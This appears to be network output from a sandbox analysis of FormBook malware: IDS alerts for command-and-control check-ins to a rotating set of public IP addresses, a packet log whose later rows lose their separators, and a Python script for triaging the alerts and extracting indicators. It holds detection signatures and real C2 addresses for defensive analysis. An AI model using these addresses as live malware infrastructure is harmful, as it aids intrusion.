2024-10-08T15:33:55.974521+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 60552 | 74.208.236.25 | 80 | TCP
2024-10-08T15:33:58.518622+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 60559 | 74.208.236.25 | 80 | TCP
2024-10-08T15:34:01.420541+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.9 | 60575 | 74.208.236.25 | 80 | TCP
2024-10-08T15:34:01.420541+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.9 | 60575 | 74.208.236.25 | 80 | TCP
2024-10-08T15:34:07.984460+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 60611 | 3.33.130.190 | 80 | TCP
2024-10-08T15:34:10.398319+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 60627 | 3.33.130.190 | 80 | TCP
2024-10-08T15:34:12.054678+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 60641 | 3.33.130.190 | 80 | TCP
2024-10-08T15:34:14.561340+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.9 | 60657 | 3.33.130.190 | 80 | TCP
2024-10-08T15:34:14.561340+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.9 | 60657 | 3.33.130.190 | 80 | TCP
2024-10-08T15:34:21.140669+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 60679 | 3.33.130.190 | 80 | TCP
2024-10-08T15:34:23.564525+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 60698 | 3.33.130.190 | 80 | TCP
2024-10-08T15:34:25.192247+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 60715 | 3.33.130.190 | 80 | TCP
2024-10-08T15:34:28.651115+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.9 | 60728 | 3.33.130.190 | 80 | TCP
2024-10-08T15:34:28.651115+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.9 | 60728 | 3.33.130.190 | 80 | TCP
2024-10-08T15:34:36.000173+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 60775 | 203.175.9.128 | 80 | TCP
2024-10-08T15:34:38.444808+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 60788 | 203.175.9.128 | 80 | TCP
2024-10-08T15:34:41.093787+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 60807 | 203.175.9.128 | 80 | TCP
2024-10-08T15:34:43.504908+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.9 | 60821 | 203.175.9.128 | 80 | TCP
2024-10-08T15:34:43.504908+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.9 | 60821 | 203.175.9.128 | 80 | TCP
2024-10-08T15:34:49.003817+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 60832 | 3.33.130.190 | 80 | TCP
2024-10-08T15:34:51.548045+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 60833 | 3.33.130.190 | 80 | TCP
2024-10-08T15:34:54.114725+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 60834 | 3.33.130.190 | 80 | TCP
2024-10-08T15:34:56.674011+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.9 | 60835 | 3.33.130.190 | 80 | TCP
2024-10-08T15:34:56.674011+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.9 | 60835 | 3.33.130.190 | 80 | TCP
2024-10-08T15:35:07.426657+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 60836 | 199.192.19.19 | 80 | TCP
2024-10-08T15:35:10.238944+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 60837 | 199.192.19.19 | 80 | TCP
2024-10-08T15:35:12.826861+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 60838 | 199.192.19.19 | 80 | TCP
2024-10-08T15:35:15.289129+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.9 | 60839 | 199.192.19.19 | 80 | TCP
2024-10-08T15:35:15.289129+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.9 | 60839 | 199.192.19.19 | 80 | TCP
2024-10-08T15:35:21.277375+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 60840 | 208.91.197.27 | 80 | TCP
2024-10-08T15:35:23.849037+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 60841 | 208.91.197.27 | 80 | TCP
2024-10-08T15:35:26.372438+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 60842 | 208.91.197.27 | 80 | TCP
2024-10-08T15:35:29.515917+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.9 | 60843 | 208.91.197.27 | 80 | TCP
2024-10-08T15:35:29.515917+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.9 | 60843 | 208.91.197.27 | 80 | TCP
2024-10-08T15:35:36.363602+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 60844 | 156.242.132.82 | 80 | TCP
2024-10-08T15:35:39.453234+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 60845 | 156.242.132.82 | 80 | TCP
2024-10-08T15:35:42.000108+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 60846 | 156.242.132.82 | 80 | TCP
2024-10-08T15:36:04.387734+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.9 | 60847 | 156.242.132.82 | 80 | TCP
2024-10-08T15:36:04.387734+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.9 | 60847 | 156.242.132.82 | 80 | TCP
2024-10-08T15:36:18.221807+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 60848 | 84.32.84.32 | 80 | TCP
2024-10-08T15:36:20.739145+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 60849 | 84.32.84.32 | 80 | TCP
2024-10-08T15:36:23.290927+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 60850 | 84.32.84.32 | 80 | TCP
2024-10-08T15:36:25.860953+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.9 | 60851 | 84.32.84.32 | 80 | TCP
2024-10-08T15:36:25.860953+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.9 | 60851 | 84.32.84.32 | 80 | TCP
2024-10-08T15:36:31.833598+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 60852 | 3.91.127.116 | 80 | TCP
2024-10-08T15:36:34.378358+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 60853 | 3.91.127.116 | 80 | TCP
2024-10-08T15:36:36.958949+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 60854 | 3.91.127.116 | 80 | TCP
2024-10-08T15:36:39.447772+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.9 | 60855 | 3.91.127.116 | 80 | TCP
2024-10-08T15:36:39.447772+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.9 | 60855 | 3.91.127.116 | 80 | TCP
2024-10-08T15:36:45.350125+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 60856 | 195.161.68.8 | 80 | TCP
2024-10-08T15:36:47.872321+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 60857 | 195.161.68.8 | 80 | TCP
2024-10-08T15:36:50.434708+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 60858 | 195.161.68.8 | 80 | TCP
2024-10-08T15:36:52.998866+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.9 | 60859 | 195.161.68.8 | 80 | TCP
2024-10-08T15:36:52.998866+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.9 | 60859 | 195.161.68.8 | 80 | TCP
2024-10-08T15:36:58.822777+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 60860 | 194.58.112.174 | 80 | TCP
2024-10-08T15:37:01.358985+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 60861 | 194.58.112.174 | 80 | TCP
2024-10-08T15:37:03.925498+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 60862 | 194.58.112.174 | 80 | TCP
2024-10-08T15:37:06.473050+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.9 | 60863 | 194.58.112.174 | 80 | TCP
2024-10-08T15:37:06.473050+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.9 | 60863 | 194.58.112.174 | 80 | TCP
2024-10-08T15:37:12.998557+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 60864 | 15.197.204.56 | 80 | TCP
2024-10-08T15:37:15.516621+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 60865 | 15.197.204.56 | 80 | TCP
2024-10-08T15:37:18.064555+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 60866 | 15.197.204.56 | 80 | TCP
2024-10-08T15:37:20.988426+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.9 | 60867 | 15.197.204.56 | 80 | TCP
2024-10-08T15:37:20.988426+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.9 | 60867 | 15.197.204.56 | 80 | TCP
2024-10-08T15:37:27.559782+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 60868 | 154.23.184.240 | 80 | TCP
2024-10-08T15:37:30.080815+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 60869 | 154.23.184.240 | 80 | TCP
2024-10-08T15:37:32.875337+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 60870 | 154.23.184.240 | 80 | TCP
2024-10-08T15:37:35.160910+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.9 | 60871 | 154.23.184.240 | 80 | TCP
2024-10-08T15:37:35.160910+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.9 | 60871 | 154.23.184.240 | 80 | TCP
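The IDS table above repeats one pattern against a changing list of hosts: three POST check-ins a few seconds apart, then a GET, then the next host. The Python script below is an added triage example, not part of the Joe Sandbox report or its tooling. It parses a handful of the rows above (embedded inline as tab-separated lines, constructed here in the table's column order), collapses the ET/ETPRO rule pairs that fire on the same GET request so each check-in is counted once, summarises POST/GET counts and inter-request gaps per destination, and extracts the destination IP:port pairs as network IOCs. The three-POST/one-GET cycle and the 1-5 second gap window are thresholds taken from this run, not FormBook constants; FormBook is known to cycle through a list of candidate hosts of which only some are live C2, so a host that completes the cycle is worth blocking but not automatically the real server.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import median

# Constructed sample: a subset of the report's IDS alert rows, tab-separated in
# the table's column order (timestamp, SID, signature, severity, source IP,
# source port, dest IP, dest port, protocol).
SAMPLE_ALERTS = """\
2024-10-08T15:33:37.818114+0200\t2050745\tET MALWARE FormBook CnC Checkin (GET) M5\t1\t192.168.2.9\t60549\t3.33.130.190\t80\tTCP
2024-10-08T15:33:37.818114+0200\t2855465\tETPRO MALWARE FormBook CnC Checkin (GET) M2\t1\t192.168.2.9\t60549\t3.33.130.190\t80\tTCP
2024-10-08T15:33:53.420266+0200\t2855464\tETPRO MALWARE FormBook CnC Checkin (POST) M3\t1\t192.168.2.9\t60551\t74.208.236.25\t80\tTCP
2024-10-08T15:33:55.974521+0200\t2855464\tETPRO MALWARE FormBook CnC Checkin (POST) M3\t1\t192.168.2.9\t60552\t74.208.236.25\t80\tTCP
2024-10-08T15:33:58.518622+0200\t2855464\tETPRO MALWARE FormBook CnC Checkin (POST) M3\t1\t192.168.2.9\t60559\t74.208.236.25\t80\tTCP
2024-10-08T15:34:01.420541+0200\t2050745\tET MALWARE FormBook CnC Checkin (GET) M5\t1\t192.168.2.9\t60575\t74.208.236.25\t80\tTCP
2024-10-08T15:34:01.420541+0200\t2855465\tETPRO MALWARE FormBook CnC Checkin (GET) M2\t1\t192.168.2.9\t60575\t74.208.236.25\t80\tTCP
2024-10-08T15:34:36.000173+0200\t2855464\tETPRO MALWARE FormBook CnC Checkin (POST) M3\t1\t192.168.2.9\t60775\t203.175.9.128\t80\tTCP
2024-10-08T15:34:38.444808+0200\t2855464\tETPRO MALWARE FormBook CnC Checkin (POST) M3\t1\t192.168.2.9\t60788\t203.175.9.128\t80\tTCP
2024-10-08T15:34:41.093787+0200\t2855464\tETPRO MALWARE FormBook CnC Checkin (POST) M3\t1\t192.168.2.9\t60807\t203.175.9.128\t80\tTCP
2024-10-08T15:34:43.504908+0200\t2050745\tET MALWARE FormBook CnC Checkin (GET) M5\t1\t192.168.2.9\t60821\t203.175.9.128\t80\tTCP
2024-10-08T15:34:43.504908+0200\t2855465\tETPRO MALWARE FormBook CnC Checkin (GET) M2\t1\t192.168.2.9\t60821\t203.175.9.128\t80\tTCP
"""

SIG_METHOD = re.compile(r"\((GET|POST)\)")  # HTTP verb named in the ET signature


def parse_alert(line):
    """Split one tab-separated alert row into typed fields."""
    ts, sid, sig, sev, src_ip, src_port, dst_ip, dst_port, proto = line.split("\t")
    m = SIG_METHOD.search(sig)
    return {
        "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z"),
        "sid": int(sid),
        "method": m.group(1) if m else None,
        "src": src_ip,
        "src_port": int(src_port),
        "dst": dst_ip,
        "dst_port": int(dst_port),
    }


def checkins(table):
    """Parse all rows and collapse alerts raised on the same connection.

    The ET (2050745) and ETPRO (2855465) GET rules both fire on one request,
    so a single check-in shows up as two rows with the same timestamp and
    client port; count it once.
    """
    seen, events = set(), []
    for line in table.strip().splitlines():
        a = parse_alert(line)
        key = (a["ts"], a["src"], a["src_port"], a["dst"], a["dst_port"])
        if key not in seen:
            seen.add(key)
            events.append(a)
    return events


def per_destination(events):
    """Count GET/POST check-ins per destination and the seconds between them."""
    hosts = defaultdict(lambda: {"POST": 0, "GET": 0, "gaps": []})
    last_seen = {}
    for e in sorted(events, key=lambda ev: ev["ts"]):
        stats = hosts[e["dst"]]
        if e["method"] in ("GET", "POST"):
            stats[e["method"]] += 1
        if e["dst"] in last_seen:
            stats["gaps"].append((e["ts"] - last_seen[e["dst"]]).total_seconds())
        last_seen[e["dst"]] = e["ts"]
    return dict(hosts)


def beacon_report(table, min_gap=1.0, max_gap=5.0):
    """Flag destinations showing the full cycle seen in this run: three POST
    check-ins then one GET, each a few seconds apart. The counts and the gap
    window are assumptions taken from this trace, not FormBook constants."""
    report = {}
    for dst, s in per_destination(checkins(table)).items():
        gap = median(s["gaps"]) if s["gaps"] else None
        full_cycle = (s["POST"] == 3 and s["GET"] == 1
                      and all(min_gap <= g <= max_gap for g in s["gaps"]))
        report[dst] = {"POST": s["POST"], "GET": s["GET"],
                       "median_gap_s": gap, "full_cycle": full_cycle}
    return report


def iocs(table):
    """Unique destination IP:port pairs, i.e. the network IOCs to block or hunt for."""
    return sorted({f"{e['dst']}:{e['dst_port']}" for e in checkins(table)})


if __name__ == "__main__":
    for dst, r in beacon_report(SAMPLE_ALERTS).items():
        print(f"{dst:15} POST={r['POST']} GET={r['GET']} "
              f"median_gap={r['median_gap_s']} full_cycle={r['full_cycle']}")
    print("IOCs:", ", ".join(iocs(SAMPLE_ALERTS)))
```

On the sample rows the script reports 74.208.236.25 and 203.175.9.128 as completing the cycle (3 POST, 1 GET, median gap about 2.5 s), while 3.33.130.190 shows only a GET because the table starts mid-cycle. Run it on the full table to get the complete host list; the first 3.33.130.190 host recurs several times, which is what you would expect if the sample walks its host list in a loop.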
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 8, 2024 15:33:36.216275930 CEST | 60549 | 80 | 192.168.2.9 | 3.33.130.190
Oct 8, 2024 15:33:36.222327948 CEST | 80 | 60549 | 3.33.130.190 | 192.168.2.9
Oct 8, 2024 15:33:36.222448111 CEST | 60549 | 80 | 192.168.2.9 | 3.33.130.190
Oct 8, 2024 15:33:36.230236053 CEST | 60549 | 80 | 192.168.2.9 | 3.33.130.190
Oct 8, 2024 15:33:36.235281944 CEST | 80 | 60549 | 3.33.130.190 | 192.168.2.9
Oct 8, 2024 15:33:37.817831039 CEST | 80 | 60549 | 3.33.130.190 | 192.168.2.9
Oct 8, 2024 15:33:37.817910910 CEST | 80 | 60549 | 3.33.130.190 | 192.168.2.9
Oct 8, 2024 15:33:37.817923069 CEST | 80 | 60549 | 3.33.130.190 | 192.168.2.9
Oct 8, 2024 15:33:37.818114042 CEST | 60549 | 80 | 192.168.2.9 | 3.33.130.190
Oct 8, 2024 15:33:37.821636915 CEST | 60549 | 80 | 192.168.2.9 | 3.33.130.190
Oct 8, 2024 15:33:37.827649117 CEST | 80 | 60549 | 3.33.130.190 | 192.168.2.9
Oct 8, 2024 15:33:52.897890091 CEST | 60551 | 80 | 192.168.2.9 | 74.208.236.25
Oct 8, 2024 15:33:52.903253078 CEST | 80 | 60551 | 74.208.236.25 | 192.168.2.9
Oct 8, 2024 15:33:52.903402090 CEST | 60551 | 80 | 192.168.2.9 | 74.208.236.25
Oct 8, 2024 15:33:52.914947987 CEST | 60551 | 80 | 192.168.2.9 | 74.208.236.25
Oct 8, 2024 15:33:52.920305967 CEST | 80 | 60551 | 74.208.236.25 | 192.168.2.9
Oct 8, 2024 15:33:53.420114040 CEST | 80 | 60551 | 74.208.236.25 | 192.168.2.9
Oct 8, 2024 15:33:53.420178890 CEST | 80 | 60551 | 74.208.236.25 | 192.168.2.9
Oct 8, 2024 15:33:53.420265913 CEST | 60551 | 80 | 192.168.2.9 | 74.208.236.25
Oct 8, 2024 15:33:54.421956062 CEST | 60551 | 80 | 192.168.2.9 | 74.208.236.25
Oct 8, 2024 15:33:55.440839052 CEST | 60552 | 80 | 192.168.2.9 | 74.208.236.25
Oct 8, 2024 15:33:55.446353912 CEST | 80 | 60552 | 74.208.236.25 | 192.168.2.9
Oct 8, 2024 15:33:55.446523905 CEST | 60552 | 80 | 192.168.2.9 | 74.208.236.25
Oct 8, 2024 15:33:55.464616060 CEST | 60552 | 80 | 192.168.2.9 | 74.208.236.25
Oct 8, 2024 15:33:55.469789982 CEST | 80 | 60552 | 74.208.236.25 | 192.168.2.9
Oct 8, 2024 15:33:55.974159956 CEST | 80 | 60552 | 74.208.236.25 | 192.168.2.9
Oct 8, 2024 15:33:55.974373102 CEST | 80 | 60552 | 74.208.236.25 | 192.168.2.9
Oct 8, 2024 15:33:55.974520922 CEST | 60552 | 80 | 192.168.2.9 | 74.208.236.25
Oct 8, 2024 15:33:56.968823910 CEST | 60552 | 80 | 192.168.2.9 | 74.208.236.25
Oct 8, 2024 15:33:57.987437963 CEST | 60559 | 80 | 192.168.2.9 | 74.208.236.25
Oct 8, 2024 15:33:57.993284941 CEST | 80 | 60559 | 74.208.236.25 | 192.168.2.9
Oct 8, 2024 15:33:57.993416071 CEST | 60559 | 80 | 192.168.2.9 | 74.208.236.25
Oct 8, 2024 15:33:58.003472090 CEST | 60559 | 80 | 192.168.2.9 | 74.208.236.25
Oct 8, 2024 15:33:58.009254932 CEST | 80 | 60559 | 74.208.236.25 | 192.168.2.9
Oct 8, 2024 15:33:58.009927034 CEST | 80 | 60559 | 74.208.236.25 | 192.168.2.9
Oct 8, 2024 15:33:58.518306971 CEST | 80 | 60559 | 74.208.236.25 | 192.168.2.9
Oct 8, 2024 15:33:58.518554926 CEST | 80 | 60559 | 74.208.236.25 | 192.168.2.9
Oct 8, 2024 15:33:58.518621922 CEST | 60559 | 80 | 192.168.2.9 | 74.208.236.25
Oct 8, 2024 15:33:59.515562057 CEST | 60559 | 80 | 192.168.2.9 | 74.208.236.25
Oct 8, 2024 15:34:00.534940004 CEST | 60575 | 80 | 192.168.2.9 | 74.208.236.25
Oct 8, 2024 15:34:00.888519049 CEST | 80 | 60575 | 74.208.236.25 | 192.168.2.9
Oct 8, 2024 15:34:00.890789032 CEST | 60575 | 80 | 192.168.2.9 | 74.208.236.25
Oct 8, 2024 15:34:00.898246050 CEST | 60575 | 80 | 192.168.2.9 | 74.208.236.25
Oct 8, 2024 15:34:00.903448105 CEST | 80 | 60575 | 74.208.236.25 | 192.168.2.9
Oct 8, 2024 15:34:01.419403076 CEST | 80 | 60575 | 74.208.236.25 | 192.168.2.9
Oct 8, 2024 15:34:01.420407057 CEST | 80 | 60575 | 74.208.236.25 | 192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:01.420541048 CEST6057580192.168.2.974.208.236.25
                                                                                                                                                                                                              Oct 8, 2024 15:34:01.422384024 CEST6057580192.168.2.974.208.236.25
                                                                                                                                                                                                              Oct 8, 2024 15:34:01.427606106 CEST806057574.208.236.25192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:06.459428072 CEST6061180192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:06.464278936 CEST80606113.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:06.464428902 CEST6061180192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:06.474298000 CEST6061180192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:06.479410887 CEST80606113.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:07.984460115 CEST6061180192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:08.000591040 CEST80606113.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:08.000654936 CEST6061180192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:09.003706932 CEST6062780192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:09.010478020 CEST80606273.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:09.010601044 CEST6062780192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:09.021058083 CEST6062780192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:09.026278973 CEST80606273.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:10.398233891 CEST80606273.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:10.398319006 CEST6062780192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:10.534012079 CEST6062780192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:10.540570021 CEST80606273.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:11.550338030 CEST6064180192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:11.555488110 CEST80606413.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:11.555603981 CEST6064180192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:11.565047026 CEST6064180192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:11.570103884 CEST80606413.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:11.570441008 CEST80606413.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:12.054574966 CEST80606413.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:12.054677963 CEST6064180192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:13.079571009 CEST6064180192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:13.084527969 CEST80606413.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:14.097464085 CEST6065780192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:14.102715015 CEST80606573.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:14.102838039 CEST6065780192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:14.109869957 CEST6065780192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:14.114891052 CEST80606573.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:14.561187983 CEST80606573.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:14.561206102 CEST80606573.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:14.561340094 CEST6065780192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:14.563975096 CEST6065780192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:14.569063902 CEST80606573.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:19.605757952 CEST6067980192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:19.611465931 CEST80606793.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:19.611609936 CEST6067980192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:19.625890017 CEST6067980192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:19.631180048 CEST80606793.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:21.140669107 CEST6067980192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:21.146343946 CEST80606793.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:21.146471977 CEST6067980192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:22.159960985 CEST6069880192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:22.165713072 CEST80606983.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:22.165802956 CEST6069880192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:22.176304102 CEST6069880192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:22.181421041 CEST80606983.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:23.564466953 CEST80606983.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:23.564524889 CEST6069880192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:23.687494040 CEST6069880192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:23.692594051 CEST80606983.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:24.707370043 CEST6071580192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:24.712521076 CEST80607153.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:24.712611914 CEST6071580192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:24.727288008 CEST6071580192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:24.732328892 CEST80607153.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:24.732459068 CEST80607153.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:25.192147017 CEST80607153.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:25.192246914 CEST6071580192.168.2.93.33.130.190
